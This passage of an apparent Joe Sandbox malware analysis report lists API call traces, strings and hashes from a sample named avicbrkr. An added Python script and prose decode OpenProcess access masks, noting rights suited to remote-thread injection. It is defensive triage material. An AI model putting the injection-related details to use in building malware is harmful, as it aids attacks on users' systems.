                      • GetLastError.KERNEL32 ref: 003787B5
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003787C8
                      • GetLastError.KERNEL32 ref: 003787D3
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037881B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                      • String ID:
                      • API String ID: 1671499436-0
                      • Opcode ID: 1f93507cd19363385db148d11d0d74c53f383f0500bca0eaae82f9ea0b6cce20
                      • Instruction ID: dfe5813abf18ba0bb7923235d07824525087f04a96afa087b1da9a95d2f1cab6
                      • Opcode Fuzzy Hash: 1f93507cd19363385db148d11d0d74c53f383f0500bca0eaae82f9ea0b6cce20
                      • Instruction Fuzzy Hash: B021AE70540244FBEB338B55DC8DB5A7BBDFB00314FB08429E146965E0CBBA9D84DB11
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • DeleteFileA.KERNEL32(00000000,000004D2), ref: 003711D6
                      • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 003711DF
                      • GetLastError.KERNEL32 ref: 003711E9
                        • Part of subcall function 00371000: lstrcpy.KERNEL32(00000000,?), ref: 00371046
                        • Part of subcall function 00371000: RtlAllocateHeap.NTDLL(00000000,?), ref: 00371115
                        • Part of subcall function 00371000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00371145
                        • Part of subcall function 00371000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0037115E
                        • Part of subcall function 00371000: CloseHandle.KERNEL32(00000000), ref: 00371168
                        • Part of subcall function 00371000: HeapFree.KERNEL32(00000000,?), ref: 00371178
                        • Part of subcall function 00371000: HeapFree.KERNEL32(00000000,00000000), ref: 00371193
                        • Part of subcall function 00371000: HeapFree.KERNEL32(00000000,?), ref: 003711A3
                        • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                        • Part of subcall function 003779BC: lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                        • Part of subcall function 003779BC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                        • Part of subcall function 003779BC: mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                        • Part of subcall function 003779BC: CloseHandle.KERNEL32(?), ref: 00377A61
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 0037125E
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037126D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFree$Create$AllocateCloseDirectoryHandleTimelstrcpy$CurrentDeleteErrorLastNameRemoveSystemTempThreadWritelstrlenmbstowcs
                      • String ID:
                      • API String ID: 2670931601-0
                      • Opcode ID: 9a6add339eae09ff4e9a659d16d295a93debb3df0a31ec17b7afd77da4d89d20
                      • Instruction ID: 7858d77b6f9c38a908a792ff895cb9223bc3815fe215c0c79ce0f0c096179c9c
                      • Opcode Fuzzy Hash: 9a6add339eae09ff4e9a659d16d295a93debb3df0a31ec17b7afd77da4d89d20
                      • Instruction Fuzzy Hash: 25018433A9A26572D63377AA5C0BFCB3D1C9F46BF2F204115F60CA91C29E59544081FA
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(00377A4C,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E4E
                      • memcpy.NTDLL(00377A4C,?,00000009,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E70
                      • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00377E88
                      • lstrlenW.KERNEL32(00000000,00000001,00377A4C,?,?,?,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377EA8
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377ECD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapTimememcpy$AllocateCloseCreateFileFreeSystemlstrlen
                      • String ID:
                      • API String ID: 1553019701-0
                      • Opcode ID: 05fd76fd7c5a1c04b3d67fa1bb31d2edaab574e63de4361ccc3a10b5bd00525f
                      • Instruction ID: 78a16d317c2d15b8baae8482e2e56ae36836121143b0b13d11830c1d0dbfee5f
                      • Opcode Fuzzy Hash: 05fd76fd7c5a1c04b3d67fa1bb31d2edaab574e63de4361ccc3a10b5bd00525f
                      • Instruction Fuzzy Hash: 24114676D05208BBCB229BA4DC09FDE7FBDEB48750F048056F909E7291E675D604CB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • GetCurrentThreadId.KERNEL32(?,?,?,00634AE0,?,0063763C,00000000,00632DC5,00000750), ref: 00634A85
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00634AE0,?,0063763C,00000000,00632DC5,00000750), ref: 00634A91
                      • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 00634A9F
                      • PathFindExtensionA.SHLWAPI(00000000), ref: 00634AB3
                      • lstrcpy.KERNEL32(00000000), ref: 00634ABA
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeapTime$AllocateCurrentExtensionFindFreeNamePathSystemTempThreadlstrcpy
                      • String ID:
                      • API String ID: 1355202529-0
                      • Opcode ID: ea1d292d867390d0687359efa4ac4b60ecc6905a18c5a198638d3fe2b5387cd9
                      • Instruction ID: 331f2169d9c1a80752c1095cc5c59d974f2af1b5342673afc52040785557b075
                      • Opcode Fuzzy Hash: ea1d292d867390d0687359efa4ac4b60ecc6905a18c5a198638d3fe2b5387cd9
                      • Instruction Fuzzy Hash: FB01B172E002157FD7505FB4CC89EABBA6EEF00B44B091225BA02E7205DF70ED0486F4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038ECF0: lstrlen.KERNEL32(0039D47C,0039D418,00000000,?,0038F79B,0039D47C,0039706C,00000000,00397050,0039D424,0039D424,00000000,0038F2FB,00000000,?,?), ref: 0038ECFC
                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00375DEF
                      • memcpy.NTDLL(00000000,?,?), ref: 00375E02
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375E13
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375E28
                        • Part of subcall function 0037B171: lstrcmpi.KERNEL32(?,0039E4AD), ref: 0037B1C8
                        • Part of subcall function 0037B171: HeapFree.KERNEL32(00000000,00000000,00375E4C), ref: 0037B1F5
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00375E60
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$CriticalFreeSection$AllocateEnterLeavelstrcmpilstrlenmemcpy
                      • String ID:
                      • API String ID: 382049228-0
                      • Opcode ID: 0c1a35a1d77ac966d595b37a1e68d6b588e0f88a87363324ff3bbda2b956840e
                      • Instruction ID: ace6a1740fa7671c58c7fb6b5dcc9e817c7abd28ad471710b7a535ce4f6a13e2
                      • Opcode Fuzzy Hash: 0c1a35a1d77ac966d595b37a1e68d6b588e0f88a87363324ff3bbda2b956840e
                      • Instruction Fuzzy Hash: A3110836105210AFCB276F28EC45D6B7BACEB46321B06417BF90593260D7765C01CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0037AA58
                      • wsprintfA.USER32 ref: 0037AA6D
                      • RegCreateKeyA.ADVAPI32(80000001,0039D500,00000000), ref: 0037AA85
                      • RegCloseKey.ADVAPI32(?), ref: 0037AAAD
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037AABC
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCreateFreewsprintf
                      • String ID:
                      • API String ID: 1380539425-0
                      • Opcode ID: 823351ce407c9a1f4fdd12a085a912f7b3b6299bafef1554c9cc858a927dffcd
                      • Instruction ID: 6a38addf92bf20fcdc4b13cc1c8805b54b4ce0657339c0549c1f40977c49b49d
                      • Opcode Fuzzy Hash: 823351ce407c9a1f4fdd12a085a912f7b3b6299bafef1554c9cc858a927dffcd
                      • Instruction Fuzzy Hash: 75014036110104BFDB139B94EC49EAE3F7DEB44750F104026FA0491170EB779D509B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0037138B,?), ref: 003883FE
                      • GetVersion.KERNEL32 ref: 0038840D
                      • GetCurrentProcessId.KERNEL32 ref: 0038841C
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00388439
                      • GetLastError.KERNEL32 ref: 00388458
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                      • String ID:
                      • API String ID: 2270775618-0
                      • Opcode ID: a03eacdcc369fcbddbe622496a2aed673d5db8c9c6d851f80482da34fff6da2a
                      • Instruction ID: 073505357034a0651eae2bdcf41895d90d28852a11fd85c372b176fc9730041f
                      • Opcode Fuzzy Hash: a03eacdcc369fcbddbe622496a2aed673d5db8c9c6d851f80482da34fff6da2a
                      • Instruction Fuzzy Hash: B8F09A71656303AFE763AB26AD0BB193B6DA704710F104817E696C62E0DF72C441EB28
                      Uniqueness

                      Uniqueness Score: -1,00%
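The records above list each function's imported calls with the argument values the Joe Sandbox IDA plugin saw on the stack at call time, as raw hex ('?' marks a value it could not resolve, and "Part of subcall function" lines belong to callees reached from the function). The access masks and handle constants are what a triager actually reads out of them: the OpenProcess at 00388439 asks for 0010047A, the one in subcall 0038D759 for 001F0FFF, RegCreateKeyA is called with root 80000001, and the two CreateFileA calls use 0xC0000000/4 and 0x80000000/3. The script below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses lines in exactly the format shown on this page (the sample excerpt is copied from the records above) and decodes those arguments with the standard Win32 constants. The "injection-capable" label is my own heuristic (CREATE_THREAD|VM_OPERATION|VM_READ|VM_WRITE all present), and the function and table names are assumptions of this example.

```python
"""Parse Joe Sandbox 'APIs' records and decode raw hex arguments.

Added example; not part of the Joe Sandbox report or its IDA plugin.
Argument values are what the plugin observed in one run; '?' means the
value was not resolved, so only fully numeric arguments are decoded."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt, copied line-for-line from records on this page.
SAMPLE = """\
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0037138B,?), ref: 003883FE
• GetCurrentProcessId.KERNEL32 ref: 0038841C
• OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00388439
  • Part of subcall function 0038D759: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,pnls), ref: 0038D784
• RegCreateKeyA.ADVAPI32(80000001,0039D500,00000000), ref: 0037AA85
  • Part of subcall function 00371000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00371145
  • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
"""

# Win32 process access rights (winnt.h) plus the standard rights bits.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
# Heuristic (mine): the rights remote-thread injection needs in one handle.
INJECTION_MASK = 0x0002 | 0x0008 | 0x0010 | 0x0020
PROCESS_ALL_ACCESS_PRE_VISTA = 0x001F0FFF  # 0x001FFFFF on Vista+ SDKs
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# One API line: optional subcall prefix, Api.MODULE(args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]            # raw argument text; '?' = unresolved
    ref: int                   # call-site address
    subcall: Optional[int] = None  # callee the line was attributed to
    notes: List[str] = field(default_factory=list)


def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as 'APIs' or 'Strings'
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def _hex(arg: str) -> Optional[int]:
    """Integer value of a fully numeric hex argument, None for '?' or text."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def decode_mask(mask: int, table: dict) -> List[str]:
    names = [name for bit, name in table.items() if mask & bit]
    rest = mask & ~sum(table.keys())  # bits the table does not name
    if rest:
        names.append(f"0x{rest:X}")
    return names


def annotate(call: Call) -> Call:
    """Attach the decoded meaning of the arguments a triager cares about."""
    if call.api == "OpenProcess" and call.args:
        mask = _hex(call.args[0])
        if mask is not None:
            call.notes.append("access=" + "|".join(decode_mask(mask, PROCESS_RIGHTS)))
            if mask & INJECTION_MASK == INJECTION_MASK:
                call.notes.append("injection-capable handle")
            if mask == PROCESS_ALL_ACCESS_PRE_VISTA:
                call.notes.append("PROCESS_ALL_ACCESS (pre-Vista SDK value)")
    elif call.api.startswith(("RegCreateKey", "RegOpenKey")) and call.args:
        root = _hex(call.args[0])
        if root in HKEYS:
            call.notes.append("root=" + HKEYS[root])
    elif call.api in ("CreateFileA", "CreateFileW") and len(call.args) >= 5:
        access, disp = _hex(call.args[1]), _hex(call.args[4])
        if access is not None:
            generic = [n for bit, n in ((0x80000000, "GENERIC_READ"),
                                        (0x40000000, "GENERIC_WRITE")) if access & bit]
            call.notes.append("access=" + ("|".join(generic) or f"0x{access:X}"))
        if disp in DISPOSITION:
            call.notes.append("disposition=" + DISPOSITION[disp])
    return call


def triage(text: str) -> List[Call]:
    return [annotate(c) for c in parse_calls(text)]


if __name__ == "__main__":
    for c in triage(SAMPLE):
        where = f"{c.ref:08X}" + (f" (in {c.subcall:08X})" if c.subcall else "")
        print(f"{where}: {c.api}.{c.module}  {'; '.join(c.notes)}")
```

Run against the excerpt, the OpenProcess at 00388439 decodes to CREATE_THREAD|VM_OPERATION|VM_READ|VM_WRITE|DUP_HANDLE|QUERY_INFORMATION|SYNCHRONIZE, which is the minimum set a WriteProcessMemory/CreateRemoteThread sequence needs and deliberately omits PROCESS_TERMINATE; the 001F0FFF in subcall 0038D759 is the pre-Vista PROCESS_ALL_ACCESS, a hint that the code was built against an older SDK target. Treat the decoded values as leads to confirm in the behaviour sections and the process dumps, not as proof: the plugin records one execution's stack contents, and a '?' argument (the PID in the first OpenProcess is 00000000 here, for instance) can simply mean the value was not recoverable from the snapshot.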

                      APIs
                      • StrToIntExA.SHLWAPI(?,00000000,?), ref: 0037E339
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037E369
                      • memcpy.NTDLL(00000000,?,?), ref: 0037E37A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeapmemcpy
                      • String ID: ~FvR9
                      • API String ID: 1925790395-3041887914
                      • Opcode ID: 347d843cc31e2ed5ddde96db54223f82da017abed62ad343a9f829d81fcca16c
                      • Instruction ID: b8a36cd47404ab188014586b9058faee5714ec68053244251a967d2a1a6b5535
                      • Opcode Fuzzy Hash: 347d843cc31e2ed5ddde96db54223f82da017abed62ad343a9f829d81fcca16c
                      • Instruction Fuzzy Hash: 2131A632900165EFDB32EF94C4848ADB7B9AB09314F66C6BBE5199B141D7789E44CB40
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00389D75
                      • lstrlen.KERNEL32(00000000), ref: 00389D86
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • StrChrA.SHLWAPI(00000000,0000003A), ref: 00389DA7
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFreelstrlenmemset
                      • String ID: ~FvR9
                      • API String ID: 1136211775-3041887914
                      • Opcode ID: bf9941108329c4346274a1059293b887e12c037d85fe6777c07c00ecd83aeb20
                      • Instruction ID: d51e3a56b2cda31ccf77e91b76f104865d05e84967dcab8643083440ce1781e8
                      • Opcode Fuzzy Hash: bf9941108329c4346274a1059293b887e12c037d85fe6777c07c00ecd83aeb20
                      • Instruction Fuzzy Hash: 6521CF72500301AFDB22AF64DC89B3A77ACFF44312F09885BF95687291EBB5D844CB65
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 00376DF0
                        • Part of subcall function 0038D759: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,pnls), ref: 0038D784
                        • Part of subcall function 0038D759: CloseHandle.KERNEL32(?), ref: 0038D7F9
                        • Part of subcall function 0038D759: GetLastError.KERNEL32 ref: 0038D801
                        • Part of subcall function 0038D759: CloseHandle.KERNEL32(?), ref: 0038D813
                        • Part of subcall function 0038D759: GetLastError.KERNEL32 ref: 0038D81B
                      • RtlFreeAnsiString.NTDLL(?), ref: 00376E68
                      • WaitForSingleObject.KERNEL32(00000000), ref: 00376E76
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastString$AnsiFreeObjectOpenProcessSingleUnicodeUpcaseWait
                      • String ID: pnls
                      • API String ID: 1493223076-141991303
                      • Opcode ID: 446c976666b1caa1fc3137b7920a5a01aca9f48a3ef656b57365b6cb0074c012
                      • Instruction ID: 9267b6d3d3f427db7267ea80a4830dcb3b153165916bcb3783c580174afa6b0b
                      • Opcode Fuzzy Hash: 446c976666b1caa1fc3137b7920a5a01aca9f48a3ef656b57365b6cb0074c012
                      • Instruction Fuzzy Hash: 21210536114B119BCB32DF24DE5A66B73A9AB40700F10CD1AF048C3991D779E85487A1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003877A0: GetLastError.KERNEL32(00000024,?,003879FB,00000000,00000000,00399550,00000014,003881BE,?,00000000,?,?,00000000,0039C828,00000000), ref: 003877CD
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 00387EB3
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387ED1
                      • GetLastError.KERNEL32(?,00375F66,00397048,00376483,?,?,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001), ref: 00387EE1
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalErrorLastSection$EnterFreeHeapLeave
                      • String ID: H}*
                      • API String ID: 132096965-3236088583
                      • Opcode ID: e14356346919da57b776125c2e9180d4368cd99a1337e5e9237dd777ed5adfa4
                      • Instruction ID: 072dc91d5b6249f1f68081d96f09f3e746a6efe0b6f2ee7fa8d79f9e2f68b510
                      • Opcode Fuzzy Hash: e14356346919da57b776125c2e9180d4368cd99a1337e5e9237dd777ed5adfa4
                      • Instruction Fuzzy Hash: 7D2109B5600701AFD712DFA9C98595AB7F9FB08300B1045AAEA55D7B50D771FD04CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 0038939D: GetLocalTime.KERNEL32(?), ref: 003893A7
                        • Part of subcall function 0038939D: wsprintfA.USER32 ref: 003893D3
                      • wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 0037BB29: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,003714F5,?,00000000,00000000,00000000,00000006), ref: 0037BB47
                        • Part of subcall function 0037BB29: wsprintfA.USER32 ref: 0037BB65
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: wsprintf$HeapTime$AllocateFreeLocalSystem
                      • String ID: | "%s" | %u
                      • API String ID: 1069605159-3278422759
                      • Opcode ID: 56df0ffb472515aa91a2eacb24ea1a1d7b02913f79275164be0536adcd4bdedd
                      • Instruction ID: 07d2ddaf8b36850160192bb7221ea915e8e4be8f57aace13e3b66cedfd9b7490
                      • Opcode Fuzzy Hash: 56df0ffb472515aa91a2eacb24ea1a1d7b02913f79275164be0536adcd4bdedd
                      • Instruction Fuzzy Hash: A311C272500208BFDB22AF69DC45DAB7FADEB85364F104063F80997261E6369E119BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00389308,?,?,00000000,?,00373090,00000000), ref: 00387737
                      • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,00389308,?,?,00000000,?,00373090,00000000), ref: 00387742
                      • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 0038774E
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$NameTempTime$CountCreateCurrentDirectoryFreeHeapSystemThreadTicklstrcpy
                      • String ID: \Low
                      • API String ID: 2388808970-4112222293
                      • Opcode ID: d3f872c76bb047f5bab7ce49ce3f45f97301be82d218cc62b00b58c5d91583e3
                      • Instruction ID: 8c741859edbda50e2fe667cd432664b1ea5dda6707c5d2b0e37f8eb7007ffbfd
                      • Opcode Fuzzy Hash: d3f872c76bb047f5bab7ce49ce3f45f97301be82d218cc62b00b58c5d91583e3
                      • Instruction Fuzzy Hash: F3012F312197206AC2337B799C88F7B3A8E9F01B91F2600A1F200E2280DB19C900C7B4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0037A9BF
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,00000004,00000002,?,00000016,00000000,00000000,00000004,00000004,?,20000013,00000000), ref: 0038FE5E
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32 ref: 0038FE78
                      • memcpy.NTDLL(?,?,00004000,?,?,0037C95D,?,?), ref: 0037A9FD
                      • HeapFree.KERNEL32(00000000,?), ref: 0037AA1F
                      Strings
                      • Access-Control-Allow-Origin:, xrefs: 0037A9AD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorHeapLast$AllocateFreememcpy
                      • String ID: Access-Control-Allow-Origin:
                      • API String ID: 2309960269-3194369251
                      • Opcode ID: 327749d454cf6b188ae794036aa7e7ed975c0591b6053f0f8080b11f43b56aca
                      • Instruction ID: efa500329ade09ba14a9b7ac28f71ee8f4d1cae7654c8d60d26aed8d6a65dc4c
                      • Opcode Fuzzy Hash: 327749d454cf6b188ae794036aa7e7ed975c0591b6053f0f8080b11f43b56aca
                      • Instruction Fuzzy Hash: 0D118B76910605FFCB239F54EC45E5EBBB9EBC5360F208065F909A72A0E7369D60DB20
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00373CA0
                      • lstrlen.KERNEL32(EMPTY,?,?,00000000,?,00000000,?), ref: 00373CDC
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F1E9
                        • Part of subcall function 0038F08B: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038F222
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F285
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F30A
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,0039D478), ref: 0038F355
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,0039F27A), ref: 0038F368
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F377
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?), ref: 0038F38D
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000), ref: 0038F39C
                      • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 00373CF3
                      Strings
                      Memory Dump Source
